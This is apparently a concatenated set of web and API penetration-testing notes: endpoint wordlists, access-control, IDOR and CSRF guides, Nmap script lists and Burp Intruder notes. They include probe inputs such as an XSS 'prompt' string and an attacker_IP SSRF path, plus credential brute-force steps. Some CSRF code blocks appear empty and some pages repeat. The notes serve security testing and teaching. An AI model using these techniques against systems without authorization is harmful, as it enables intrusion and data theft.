Here's a few other sources too: 4 | [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) 5 | [https://github.com/chrislockard/api\_wordlist](https://github.com/chrislockard/api_wordlist) 6 | 7 | actuator 8 | 9 | health 10 | 11 | trace 12 | 13 | logfile 14 | 15 | metrics 16 | 17 | heapdump 18 | 19 | status 20 | 21 | ping 22 | 23 | api-docs 24 | 25 | application.wadl 26 | 27 | doc 28 | 29 | docs 30 | 31 | swagger-ui.html 32 | 33 | swagger.json 34 | 35 | jolokia 36 | 37 | apis 38 | 39 | api/v1/ 40 | 41 | healthz 42 | 43 | metrics 44 | 45 | swagger.json 46 | 47 | api/proxy 48 | 49 | download 50 | 51 | readfile 52 | 53 | read\_file 54 | 55 | fetch 56 | 57 | admin 58 | 59 | api/proxy?url= 60 | 61 | api/payment?id= 62 | 63 | heapdump 64 | 65 | admin/heapdump 66 | 67 | manage/heapdump 68 | 69 | actuator/heapdump 70 | 71 | solr 72 | 73 | Search-Replace-DB/ 74 | 75 | Search-Replace-DB-master/ 76 | 77 | adminer.sql 78 | 79 | composer.json 80 | 81 | manifest.json 82 | 83 | temp/ 84 | 85 | data/ 86 | 87 | test 88 | 89 | debug 90 | 91 | backup 92 | 93 | old 94 | 95 | \_admin 96 | 97 | backup 98 | 99 | application.wadl 100 | 101 | metrics 102 | 103 | graph 104 | 105 | .svn 106 | 107 | mw-config 108 | 109 | dev 110 | 111 | maintenance 112 | 113 | status2 114 | 115 | \_legacy 116 | 117 | 2 118 | 119 | graph 120 | 121 | graphiql 122 | 123 | graphql 124 | 125 | graphql-explorer 126 | 127 | graphql/cponsole 128 | 129 | heapdump 130 | 131 | jenkins/script 132 | 133 | manage/hea\[du,\[ 134 | 135 | secure/attachmentzip 136 | 137 | secure/configurereport.jspa 138 | 139 | testing 140 | 141 | version 142 | 143 | out 144 | 145 | sr 146 | 147 | sj 148 | 149 | charts 150 | 151 | secure/configurereport!default.jspa 152 | 153 | api/batch 154 | 155 | proxy/ 156 | 157 | metrics 158 | 159 | Target/proxy/attacker\_IP/attacker\_port/ 160 | 161 | ui/\#/app 162 | 163 | java 164 | 165 | dashboard 166 | 167 | pprof 168 | 169 | proxy 170 | 171 | nomad 172 | 173 | 
nomad/global/ 174 | 175 | nomad/global/cluster 176 | 177 | .php.swp 178 | 179 | test/ 180 | 181 | demo 182 | 183 | .git 184 | 185 | secret 186 | 187 | actuator 188 | 189 | beans 190 | 191 | service?wsdl 192 | 193 | passwords 194 | 195 | system/console 196 | 197 | config 198 | 199 | upload 200 | 201 | files 202 | 203 | proxy 204 | 205 | server-status 206 | 207 | web-INF/web.xml 208 | 209 | -------------------------------------------------------------------------------- /api-attacks/api-attacks.md: -------------------------------------------------------------------------------- 1 | # API attacks 2 | 3 | 4 | 5 | * access controls - authorization/authentication 6 | * basically, proving who you say you are / granting access to resources 7 | 8 | the server process for auth. checks goes like.. 9 | 10 | * if account/session exists 11 | * if request/resource is in access scope of client 12 | * if any cookies/tokens needed 13 | * if the way to route to the resource was valid 14 | * if any other conditions the server expects are met 15 | 16 | measuring success : if server returns a token/session id, further requests will be granted 17 | 18 | how to test for access controls? 
19 | 20 | * enumerate potential restricted endpoints 21 | * modify session tokens 22 | * attempt to bypass restrictions with IDOR 23 | * modify request with parameters like "&admin=true" or "test=1" 24 | * modify referrer headers to things the app will expect \(say you came from some other part of the app\) 25 | 26 | **INPUT VALIDATION** 27 | 28 | * input is ANYTHING a server takes in : from user, third party apps, elsewhere 29 | 30 | **parameters to test::** 31 | 32 | * within request header 33 | * parameters within the URL 34 | * parameters in the request 35 | * file uploads \(PUT/DELETE requests\) 36 | * input validation bugs :: -improper parameterization of requests in logic 37 | * lack of input sanitation/escaping 38 | * improper handling of parameters 39 | * file upload bugs, unicode bugs \(what can you pass into server for data and how is it handled\) 40 | 41 | **input validation fuzzing** 42 | 43 | * RCE, XSS, LFI/RFI, SQL injection, request splitting, deserialization, XXE, encoding errors with junk characters/emojis, file upload vulnerabilities, SSRF 44 | * you can use burp, gobuster, dirb, etc 45 | 46 | 47 | **Rate limiting - ways to test** 48 | 49 | * make requests in varying states of authentication 50 | * as a unauthenticated user 51 | * a legit ones 52 | * as a developer 53 | * as a bot 54 | * with a deactivated account 55 | * with bogus credentials 56 | 57 | you can make a gross amount of requests and enumerate or find DDOS ways 58 | 59 | **Restricting HTTP methods** 60 | 61 | * what the app supports and what it expects is important before fuzzing 62 | * sometimes scope of methods is too broad leading a user to be able to PUT DELETE POST etc parts of the API 63 | * even if they aren't included, an app can be lazy and have nothing to parse and will do weird shit 64 | 65 | **3rd party API abuse - sometimes APIs rely on other APIs** 66 | 67 | * there is usually trust between the two 68 | * request splitting - making additional requests to a third party 
API thru target API 69 | * SSRF - APIs that resolve URLs can be tricked into making requests to the server itself \(to gain data, enumeration, cloud access\) 70 | * mishandled input from 3rd party 71 | 72 | Information Disclosure 73 | 74 | How to find it: 75 | 76 | * use wappalyzer and look for ruby and angular or ruby/react combo 77 | * These usually follow pattern of /model/id or model/subresource/id 78 | 79 | In proxy history :: 80 | 81 | * Look for giant JSON encoded blobs in page sources 82 | * Watch for API calls 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /api-penetration-testing/api-attacks.md: -------------------------------------------------------------------------------- 1 | # API attacks 2 | 3 | 4 | 5 | * access controls - authorization/authentication 6 | * basically, proving who you say you are / granting access to resources 7 | 8 | the server process for auth. checks goes like.. 9 | 10 | * if account/session exists 11 | * if request/resource is in access scope of client 12 | * if any cookies/tokens needed 13 | * if the way to route to the resource was valid 14 | * if any other conditions the server expects are met 15 | 16 | measuring success : if server returns a token/session id, further requests will be granted 17 | 18 | how to test for access controls? 
19 | 20 | * enumerate potential restricted endpoints 21 | * modify session tokens 22 | * attempt to bypass restrictions with IDOR 23 | * modify request with parameters like "&admin=true" or "test=1" 24 | * modify referrer headers to things the app will expect \(say you came from some other part of the app\) 25 | 26 | **INPUT VALIDATION** 27 | 28 | * input is ANYTHING a server takes in : from user, third party apps, elsewhere 29 | 30 | **parameters to test::** 31 | 32 | * within request header 33 | * parameters within the URL 34 | * parameters in the request 35 | * file uploads \(PUT/DELETE requests\) 36 | * input validation bugs :: -improper parameterization of requests in logic 37 | * lack of input sanitation/escaping 38 | * improper handling of parameters 39 | * file upload bugs, unicode bugs \(what can you pass into server for data and how is it handled\) 40 | 41 | **input validation fuzzing** 42 | 43 | * RCE, XSS, LFI/RFI, SQL injection, request splitting, deserialization, XXE, encoding errors with junk characters/emojis, file upload vulnerabilities, SSRF 44 | * you can use burp, gobuster, dirb, etc 45 | 46 | 47 | **Rate limiting - ways to test** 48 | 49 | * make requests in varying states of authentication 50 | * as a unauthenticated user 51 | * a legit ones 52 | * as a developer 53 | * as a bot 54 | * with a deactivated account 55 | * with bogus credentials 56 | 57 | you can make a gross amount of requests and enumerate or find DDOS ways 58 | 59 | **Restricting HTTP methods** 60 | 61 | * what the app supports and what it expects is important before fuzzing 62 | * sometimes scope of methods is too broad leading a user to be able to PUT DELETE POST etc parts of the API 63 | * even if they aren't included, an app can be lazy and have nothing to parse and will do weird shit 64 | 65 | **3rd party API abuse - sometimes APIs rely on other APIs** 66 | 67 | * there is usually trust between the two 68 | * request splitting - making additional requests to a third party 
API thru target API 69 | * SSRF - APIs that resolve URLs can be tricked into making requests to the server itself \(to gain data, enumeration, cloud access\) 70 | * mishandled input from 3rd party 71 | 72 | Information Disclosure 73 | 74 | How to find it: 75 | 76 | * use wappalyzer and look for ruby and angular or ruby/react combo 77 | * These usually follow pattern of /model/id or model/subresource/id 78 | 79 | In proxy history :: 80 | 81 | * Look for giant JSON encoded blobs in page sources 82 | * Watch for API calls 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /api-attacks/checklist.md: -------------------------------------------------------------------------------- 1 | # Checklist 2 | 3 | 1\) Observe each parameter in every module of API, understand how the data is transferred from source to destination. Try to play with the parameter by tampering them. 4 | 5 | 2\) Identify if the API has any authorization token if it is having then remove that authorization token and see application response. In some cases, if authorization is not implemented correctly then API might give you access to forbidden assets of application. 6 | 7 | 3\) Analyze and check each module with a different access level of user ex: admin, moderator, normal user. 8 | 9 | 4\) Check whether admin modules can be accessed via the restricted user. 10 | 11 | 5\) Identify the parameters which may vulnerable to IDOR type vulnerabilities such as id=1234 and also look at the cookies for manipulating the Ids. 12 | 13 | 6\) Check injection vulnerabilities by inserting special characters in all parameters in a request and check the response from the server. If you find any stack traces then use the information for further exploitation. 14 | 15 | 7\) Insert greater than, less than \(<,>\) characters in all parameters and see response whether the application encoding them as > and <. 
If an application doesn't escape any of these special characters, it may be vulnerable to client-side attacks such as XSS \(cross-site scripting\). 16 | 17 | 8\) Modify the request's Content-Type header to probe for XML entity injection. Example: change application/json to application/xml and insert an XML entity payload to test for XXE. 18 | 19 | **most popular tools for testing REST and APIs** 20 | 21 | -postman 22 | 23 | -soapui 24 | 25 | -restAssured 26 | 27 | -httpclient api automation 28 | 29 | **AUTHENTICATION** 30 | 31 | * Check for basic auth 32 | * Test max retry and jail features in login 33 | * Sensitive data not encrypted? 34 | 35 | **JWT** 36 | 37 | * Test brute-forcing w/ jwt\_tool 38 | * Test whether the algorithm can be changed \(jwt.io\) 39 | * Test token expiration \(TTL, RTTL\) 40 | * Use jwt.io to check for sensitive data in the token 41 | * Injection possible in the 'kid' element 42 | * Check for constant-time verification of the HMAC 43 | * Check that keys and secrets differ between environments 44 | 45 | **Oauth** 46 | 47 | * Test redirect\_uri for open redirect 48 | * Test for the existence of response type token 49 | * Test for CSRF 50 | 51 | **Access** 52 | 53 | * Test brute force 54 | 55 | Ind http requests 56 | 57 | Test lack of HSTS header 58 | 59 | **INPUT** 60 | 61 | * Test HTTP methods \(GET, PUT, DELETE, PATCH, POST\) 62 | * Test different content types 63 | * Test for common vulns \(XSS, SQLi, RCE, XXE, etc\) 64 | * Test for sensitive data in URLs \(passwords, tokens, API keys\) 65 | 66 | **Processing** 67 | 68 | * Check if all endpoints are protected behind auth 69 | * Check whether the resource ID is used in the URL 70 | * Test for debug use 71 | 72 | **Output** 73 | 74 | * Check for `X-Content-Type-Options: nosniff` 75 | * `X-Frame-Options: deny` 76 | * `Content-Security-Policy: default-src 'none'` 77 | * Check for fingerprinting headers \(X-Powered-By, Server, X-AspNet-Version\) 78 | * Check for content type forcing 79 | * Check for returned 
sensitive data 80 | 81 | -------------------------------------------------------------------------------- /tools/nmap.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Fyodor's masterpiece, available everywhere it's wanted and most places that it 4 | isn't. 5 | --- 6 | 7 | # Nmap 8 | 9 | Nmap really is one of the goats. I absolutely still use it for almost every CTF, bug bounty, pentest, etc., and pretty much right away. If you're not using the NSE scripts deeply and often, you aren't using it beyond 15% of its awesome potential, so take the deep dive and take it right now. 10 | 11 | Here's a handful of web app scripts: 12 | 13 | ![](../.gitbook/assets/image%20%2814%29.png) 14 | 15 | ![Don't forget to have fun ](../.gitbook/assets/image%20%2817%29.png) 16 | 17 | ![](../.gitbook/assets/image%20%2815%29.png) 18 | 19 | Kinda went overboard with this list, but here are my favorite NSE scripts for bug bounty \(and I guess anything really\). 
20 | 21 | allseeingeye-info.nse 22 | asn-query.nse 23 | auth-owners.nse 24 | banner.nse 25 | broadcast-dropbox-discover.nse 26 | broadcast-jenkins-discover.nse 27 | citrix-enum-apps.nse 28 | citrix-enum-servers.nse 29 | citrix-user-enum 30 | citrix-user-brute 31 | couchdb-databases 32 | dns-cache-snoop.nse 33 | dns-brute.nse 34 | dns-blacklist.nse 35 | dns-service-discovery 36 | dns-srv-enum 37 | finger 38 | firewalk 39 | firewall-bypass 40 | ftp-anon 41 | ftp-bounce 42 | ftp-brute 43 | gopher-ls 44 | http-apache-negotiation 45 | http-aspnet-debug.nse 46 | http-auth 47 | http-auth-finder 48 | http-backup-finder 49 | http-bigip-cookie 50 | http-brute 51 | http-cisco-anyconnect 52 | http-csrf 53 | http-cors 54 | http-dlink-backdoor 55 | http-dombased-xss 56 | http-drupal-enum 57 | http-drupal-enum-users 58 | http-exif-spider 59 | http-favicon 60 | http-form-brute 61 | http-form-fuzzer 62 | http-grep 63 | http-joomla-brute 64 | http-methods 65 | http-method-tamper 66 | http-open-redirect 67 | http-passwd 68 | http-rfi-spider 69 | http-shellshock 70 | https-redirect 71 | http-sql-injection 72 | http-trace 73 | http-traceroute 74 | http-stored-xss 75 | http-waf-fingerprint 76 | http-xssed 77 | mongodb-brute 78 | mongodb-databases 79 | mongodb-info 80 | ms-sql-brute \(info, query, dump-hashes, config, tables\) 81 | mysql-audit \(brute, databases, enum, info, query, users, variables\) 82 | nessus-brute 83 | oracle-brute 84 | oracle-enum-users 85 | oracle-sid-brute 86 | oracle-brute-stealth 87 | pgsql-brute 88 | pop3-brute 89 | redis-info 90 | redis-brute 91 | smb-enum-groups \(domains, services, sessions, shares, users\) 92 | smb-flood 93 | smb-os-discovery 94 | smtp-brute \(commands, enum-users, strangeport\) 95 | sniffer-detect 96 | snmp-brute \(info, interfaces, netstat, processes\) 97 | socks-brute 98 | ssh-brute 99 | ssh-auth-methods 100 | ssh-run 101 | ssh-publickey-acceptance 102 | ssl-cert 103 | sstp-discover 104 | svn-brute 105 | targets-asn 106 | targets-sniffer 
107 | telnet-brute 108 | tftp-enum 109 | vulners 110 | whois-up 111 | xmpp-brute 112 | whois-domains 113 | 114 | -------------------------------------------------------------------------------- /api-penetration-testing/checklist.md: -------------------------------------------------------------------------------- 1 | # Checklist 2 | 3 | 1\) Observe each parameter in every module of the API and understand how the data travels from source to destination. Try to play with the parameters by tampering with them. 4 | 5 | 2\) Identify whether the API uses an authorization token; if it does, remove it and watch the application's response. If authorization is not implemented correctly, the API may give you access to forbidden assets of the application. 6 | 7 | 3\) Analyze and check each module with different user access levels, e.g. admin, moderator, normal user. 8 | 9 | 4\) Check whether admin modules can be accessed by a restricted user. 10 | 11 | 5\) Identify parameters that may be vulnerable to IDOR-type bugs, such as id=1234, and also look at the cookies for IDs that can be manipulated. 12 | 13 | 6\) Check for injection vulnerabilities by inserting special characters into all parameters of a request and checking the server's response. If you find any stack traces, use that information for further exploitation. 14 | 15 | 7\) Insert greater-than and less-than \(<,>\) characters into all parameters and see in the response whether the application encodes them as `&gt;` and `&lt;`. If an application doesn't escape any of these special characters, it may be vulnerable to client-side attacks such as XSS \(cross-site scripting\). 16 | 17 | 8\) Modify the request's Content-Type header to probe for XML entity injection. Example: change application/json to application/xml and insert an XML entity payload to test for XXE. 
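The server-side counterpart to items 6 to 8, as an added Python example that is not from the original repository: the handler allow-lists the Content-Type (so flipping JSON to XML is refused before any XML parser sees it), refuses any DOCTYPE on endpoints that genuinely take XML (entities can only be declared there), HTML-escapes whatever it reflects, and returns a fixed error instead of a stack trace. The function names and the sample request bodies are constructed for this example.

```python
import html
import json
import logging
import re
import xml.etree.ElementTree as ET

log = logging.getLogger("api")

# Media types this API really accepts. A request that switches JSON to XML
# (checklist item 8) is refused here and never reaches an XML parser.
ALLOWED_MEDIA_TYPES = {"application/json"}

# Entities, internal or external, can only be declared inside a DOCTYPE, so an
# XML endpoint that never needs a DTD can reject the whole declaration up front.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class RequestRejected(Exception):
    """Carries a client-safe message; the details stay in the server log."""


def media_type(content_type: str) -> str:
    """Normalise 'Application/JSON; charset=utf-8' to 'application/json'."""
    return content_type.split(";", 1)[0].strip().lower()


def parse_json_body(content_type: str, body: bytes) -> dict:
    """Item 8: only the allow-listed media type is handed to a parser at all."""
    mt = media_type(content_type)
    if mt not in ALLOWED_MEDIA_TYPES:
        raise RequestRejected(f"unsupported media type: {mt}")
    try:
        data = json.loads(body)
    except ValueError as exc:  # json.JSONDecodeError is a ValueError
        raise RequestRejected("malformed JSON body") from exc
    if not isinstance(data, dict):
        raise RequestRejected("JSON body must be an object")
    return data


def parse_xml_body(body: bytes) -> ET.Element:
    """For endpoints that legitimately take XML: refuse a DTD before parsing,
    which removes the entity-injection surface that item 8 probes for."""
    if DOCTYPE_RE.search(body):
        raise RequestRejected("DOCTYPE declarations are not accepted")
    try:
        return ET.fromstring(body)
    except ET.ParseError as exc:
        raise RequestRejected("malformed XML body") from exc


def reflect(value: str) -> str:
    """Item 7: anything echoed into HTML goes through an encoder, so '<' and
    '>' come back as &lt; and &gt; rather than as markup."""
    return html.escape(value, quote=True)


def handle(content_type: str, body: bytes) -> tuple[int, str]:
    """Item 6: the client gets a fixed message and status; the stack trace is
    logged server-side only. Returns (status, response_body)."""
    try:
        data = parse_json_body(content_type, body)
        name = str(data.get("name", ""))
        return 200, f"<p>hello {reflect(name)}</p>"
    except RequestRejected as exc:
        return 400, json.dumps({"error": str(exc)})
    except Exception:  # anything unexpected: log it, don't leak it
        log.exception("unhandled error while processing request")
        return 500, json.dumps({"error": "internal error"})


if __name__ == "__main__":
    # Constructed sample requests, one per checklist item.
    print(handle("application/json", b'{"name": "<script>alert(1)</script>"}'))
    print(handle("application/xml", b"<r><name>x</name></r>"))
    try:
        parse_xml_body(b'<!DOCTYPE d [<!ENTITY e "test">]><d>&e;</d>')
    except RequestRejected as exc:
        print("xml endpoint:", exc)
```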
18 | 19 | **most popular tools for testing REST and APIs** 20 | 21 | -postman 22 | 23 | -soapui 24 | 25 | -restAssured 26 | 27 | -httpclient api automation 28 | 29 | -Burp Suite/ZAP, of course. 30 | 31 | **AUTHENTICATION** 32 | 33 | * Check for basic auth and fuzz "admin:admin", "test:test", "guest:" or default creds after fingerprinting your target. You can set up Intruder to take a list of usernames and a list of passwords, insert a `:` in between, encode them with base64 and plug them into the `Authorization: Basic $FUZZ$` header 34 | * Test rate limiting and lockout features in login 35 | * Sensitive data not encrypted or using insufficient crypto \(i.e. MD5 or base64 + MD5, check out CyberChef or the Decode tool\) 36 | 37 | ### **JWT** 38 | 39 | * Test brute-forcing w/ jwt\_tool 40 | * Test whether the algorithm can be changed \(jwt.io or Burp\) 41 | * Test token expiration \(TTL, RTTL\) 42 | * Use jwt.io to easily decode the token and check for sensitive data in it 43 | * Injection possible in the 'kid' element 44 | * Check for constant-time verification of the HMAC 45 | * Check that keys and secrets differ between environments 46 | 47 | ### **Oauth** 48 | 49 | * Test redirect\_uri for open redirect 50 | * Test for the existence of response type token 51 | * Test for CSRF 52 | * Honestly, I need to brush up here, there's lots of research out there to learn from 53 | 54 | Test lack of HSTS header 55 | 56 | ### **INPUT** 57 | 58 | * Test HTTP methods \(GET, POST, PUT, PHATFARM, DELETE\) 59 | * Test different content types 60 | * Test for common vulns \(XSS, SQLi, RCE, XXE, etc\) 61 | * Test for sensitive data in URLs, JS files, etc... 
\(password, tokens, api keys\) 62 | 63 | ### **Processing** 64 | 65 | * check if all endpoints are protected behind auth 66 | * Check if resource iD is used in the urlk 67 | * Test for debug use 68 | 69 | ### **Output** 70 | 71 | * `X-Frame-Options: Deny` 72 | * Content security policy default src none 73 | * Check for fingerprinting headers \(X-Powered-By, Server, X-ASPnet-Version\) 74 | * Check for content-type forcing 75 | * Check for sensitive data in response 76 | 77 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/untitled.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Find any and all UIDs ● increment ● decrement ● negative values ● Attempt to 4 | perform sensitive functions substituting another UID ○ change password ○ 5 | forgot password ○ admin only functionswh 6 | --- 7 | 8 | # IDORs / Auth. Bugs 9 | 10 | **User IDs** can they be predicted? altered? created? found somewhere else in the app \(URL of user's profile, some other section of the site\) 11 | 12 | `GET /api_v1/messages?conversation_id=`**SOME\_RANDOM\_ID** `` 13 | 14 | Find any and all UIDs and manipulate them. 15 | 16 | * increment them 17 | * decrement them 18 | * substitute with negative values 19 | * try various naughty strings such as... 20 | * non UTF-8 characters, "null/undefined", 0.00, $0.0, 0.0.0, 1.0/0.0, -,, 21 | !@\#$%^&\*\(\)\`~, 22 | 23 | ­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩ 24 | 𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󐀁󐀠󐀡󐀢󐀣󐀤󐀥󐀦󐀧󐀨󐀩󐀪󐀫󐀬󐀭󐀮󐀯󐀰󐀱󐀲󐀳󐀴󐀵󐀶󐀷󐀸󐀹󐀺󐀻󐀼󐀽󐀾󐀿󐁀󐁁󐁂󐁃󐁄󐁅󐁆󐁇󐁈󐁉󐁊󐁋󐁌󐁍󐁎󐁏󐁐󐁑󐁒󐁓󐁔󐁕󐁖󐁗󐁘󐁙󐁚󐁛󐁜󐁝󐁞󐁟󐁠󐁡󐁢󐁣󐁤󐁥󐁦󐁧󐁨󐁩󐁪󐁫󐁬󐁭󐁮󐁯󐁰󐁱󐁲󐁳󐁴󐁵󐁶󐁷󐁸󐁹󐁺󐁻󐁼󐁽󐁾󐁿 25 | , ., ¸˛Ç◊ı˜Â¯˘¿ 26 | , 部落格 27 | ❤️ 💔 💌 💕 💞 28 | , ﷽ 29 | 30 | * src=JaVaSCript:prompt\(132\), eval\("puts 'hello world'"\), File:///, 🏳0🌈️, {0}, $USER 31 | 32 | Try to substitute other used IDs, hashes, e-mails or anything else belonging to a user that is non-public, if you can't guess them, create another account and pull from there. 
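The `GET /api_v1/messages?conversation_id=` case above, as an added Python example that is not from the original repository: the vulnerable handler only checks that the id exists, the hardened one validates the id's shape (which throws out the whole naughty-strings list before any lookup) and authorises the caller, and a small log check flags the increment/decrement pattern from the server side. The conversation data, user names and function names are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed in-memory store: conversation id -> participants and messages.
CONVERSATIONS = {
    1001: {"participants": {"alice", "bob"}, "messages": ["hi bob", "hi alice"]},
    1002: {"participants": {"carol"}, "messages": ["note to self"]},
}

# Shape of an acceptable id: a positive decimal integer, no leading zeros, ASCII
# digits only. Negatives, 0.00, 0.0.0, "null", unicode digits and emoji all fail.
ID_RE = re.compile(r"[1-9][0-9]{0,17}")


class ApiError(Exception):
    def __init__(self, status: int, detail: str):
        super().__init__(detail)
        self.status = status


def parse_conversation_id(raw: str) -> int:
    if not ID_RE.fullmatch(raw):
        raise ApiError(400, "conversation_id must be a positive integer")
    return int(raw)


def get_messages_vulnerable(user: str, raw_id: str) -> list[str]:
    """The IDOR: the handler asks 'does this id exist?' but never 'does the
    caller belong to it?', so walking conversation_id up or down reads
    everyone's messages. The user argument is accepted and ignored."""
    conv = CONVERSATIONS.get(int(raw_id))
    if conv is None:
        raise ApiError(404, "not found")
    return conv["messages"]


def get_messages(user: str, raw_id: str) -> list[str]:
    """Hardened: validate the id, then authorise against the caller. A missing
    conversation and someone else's conversation get the same 404, so an
    enumeration loop can't tell which ids are real."""
    cid = parse_conversation_id(raw_id)
    conv = CONVERSATIONS.get(cid)
    if conv is None or user not in conv["participants"]:
        raise ApiError(404, "not found")
    return conv["messages"]


def flag_id_walkers(access_log: list[tuple[str, str, int]], threshold: int = 3) -> set[str]:
    """Detection side: a user collecting 404s on several distinct ids is
    incrementing or decrementing them. Rows are (user, conversation_id, status)."""
    misses: dict[str, set[str]] = defaultdict(set)
    for user, cid, status in access_log:
        if status == 404:
            misses[user].add(cid)
    return {user for user, ids in misses.items() if len(ids) >= threshold}


if __name__ == "__main__":
    print("vulnerable:", get_messages_vulnerable("alice", "1002"))  # carol's messages leak
    try:
        get_messages("alice", "1002")
    except ApiError as exc:
        print("hardened:", exc.status, exc)
```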
33 | 34 | For greater business impact, it is better to target more important functions rather than less significant ones such as "change e-mail subscription settings". A few sensitive functions to prioritize your vulnerability hunting on are: 35 | 36 | * forgot password 37 | * change password 38 | * admin only functions 39 | * account recovery functions 40 | * functions handling direct messaging 41 | * private content and user information 42 | 43 | Some sensitive items you can try to access while unauthorized: 44 | 45 | * Receipts 46 | * Private files \(PDFs, images\) 47 | * Shipping info and purchase orders 48 | 49 | Even if the app doesn't ask for it, try appending `id`, `user_id`, `message_id` or other parameters to the request. 50 | 51 | **Privilege Bugs** 52 | 53 | Find functions where different types of users are granted different abilities \(admin vs. manager vs. regular user\) and try to use abilities granted only to power users. Try to browse to areas that are restricted from a regular user by directly entering the URL taken from the power user account. Autorize, Authz and Auto-repeater can all help in Burp Suite. 54 | 55 | **Common Privilege Bug Functions** 56 | 57 | * Add user function 58 | * Delete user function 59 | * start project / campaign / etc function 60 | * change account info \(pass, CC, etc\) function 61 | * customer analytics view 62 | * payment processing view 63 | * any page where you can view PII 64 | 65 | **Transporting Data** 66 | 67 | Most security-conscious sites will enable HTTPS, though not perfectly across every page. They often miss something, but only report the pages that carry sensitive information. 68 | 69 | Examples: 70 | 71 | * Sensitive images transported over HTTP 72 | * Analytics with session data / PII leaked over HTTP 73 | 74 | **Business logic flaws** 75 | 76 | The following vulnerabilities typically cannot be found with scanners and require manual testing. 
77 | 78 | * substituting hashed parameters 79 | * step manipulation 80 | * use negatives in quantities 81 | * authentication bypass 82 | * application level DoS 83 | * Timing attacks 84 | 85 | **Insecure Data Storage Methods** 86 | 87 | It's common to see mobile apps not applying encryption to the files that store PII. 88 | 89 | Common places to find PII unencrypted: 90 | 91 | * Phone system logs \(available to all apps\) 92 | * webkit cache \(cache.db\) 93 | * plists, dbs, etc. 94 | * hardcoded data in the binary 95 | 96 | 97 | 98 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/csrf.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Cross Site Request Forgery 3 | --- 4 | 5 | # CSRF 6 | 7 | An attack where a victim unknowingly causes their browser to perform an unwanted action on a site where they are already authenticated. This is usually caused by the attacker using some form of social engineering to fool a user into opening a malicious link, e-mail, instant message or program which automates the action. 8 | 9 | 10 | An unrealistic and simplified example would be a victim clicking on a link like https://paypal.com/user/sadvictim/sendfunds/99999dollars/touser/bad\_daddy or https://facebook.com/user/ignoramus/changepassword?newpassword=123456, though the links would be portrayed as something else and the victim already has logged-in cookies for those domains. 11 | 12 | The vulnerability is present if you can use the same CSRF token across multiple accounts \(check your cookies to find it\). You can build a PoC by... 13 | 14 | 15 | * Log in to account 1 16 | * Go to the password change page 17 | * Capture the CSRF token 18 | * Log out and log in to account 2 19 | * Go to the password change page 20 | * Intercept the request with a proxy and replace the token 21 | 22 | Or perhaps you can figure out the CSRF token if the implementation sucks. 
23 | 24 | 25 | * Keep the length of the token consistent and try replacing characters \(Burp has great Intruder functionality for this, or just CSRF test for the lazy\) 26 | * Try removing the token from the request 27 | * Try to decode the CSRF token \(typically MD5 or base64\) 28 | * HTML Injection with something like <form action="url.com/acquire\_token.php"></textarea> 29 | * Check to see if part of a token is static and cut off the dynamic part; I've seen bug bounty write-ups where the web app only checked the first part of the token. 30 | 31 | **Common Critical Functions for CSRF** 32 | 33 | * Add/Upload files 34 | * Password change 35 | * E-mail change 36 | * Transfer money 37 | * Delete file 38 | * Profile edits 39 | 40 | **Via GET request** 41 | requiring user interaction: 42 | `Click Me!` 43 | Not requiring user interaction \(will happen as soon as the browser loads\) 44 | `` 45 | 46 | **Via POST request** 47 | 48 | 49 | User Interaction Required 50 | 51 | ```text 52 | 
53 | 54 | 55 |
56 | ``` 57 | 58 | User Interaction Not Required 59 | 60 | ```text 61 |
62 | 63 | 64 |
65 | 66 | 69 | ``` 70 | 71 | **Via json GET** 72 | 73 | ```text 74 | 79 | ``` 80 | 81 | **Via json POST** 82 | 83 | 84 | ```text 85 | 94 | _______________________OR______________________________ 95 | ``` 102 | ``` 103 | 104 | -------------------------------------------------------------------------------- /burp-suite/intruder-payload-processing.md: -------------------------------------------------------------------------------- 1 | # Intruder Payload Processing 2 | 3 | Add prefix 4 | 5 | Add suffix 6 | 7 | Match / replace - replaces any part of payload \(based on regex\) with a string 8 | 9 | Substring - extracts portion of payload, starting from a specified offset \(0-indexed\) 10 | 11 | Reverse Substring - same as above, but counting backwards from end of the payload 12 | 13 | Modify case - uppercase/lowercase 14 | 15 | Encode - url, html, base64, ascii hex 16 | 17 | Decode - url, html, base64, ascii hex 18 | 19 | Hash - hashing operation on the payload 20 | 21 | Add raw payload - to beginning or end of payload, useful if you need to submit hashed and non-hashed 22 | 23 | Skip if matches regex - if matches a specific regex, skip to next one 24 | 25 | Invoke burp extension - pre-configured jawns by extensions 26 | 27 | * here are 18 types of payloads in intruder i.e. 28 | 29 | * Simple list 30 | * Runtime File 31 | * Case Modification 32 | * Numbers 33 | * Character substitution 34 | * Custom iterator 35 | * Recursive grep 36 | * Illegal Unicode 37 | * Character blocks 38 | * Dates 39 | * Brute Forcer 40 | * Null Payloads 41 | * Character frober 42 | * Bit Flipper 43 | * Username generator 44 | * ECB block shuffler 45 | * Extension Generated 46 | * Copy other payload 47 | 48 | Runtime file - configure a file which reads the payload strings at runtime. 
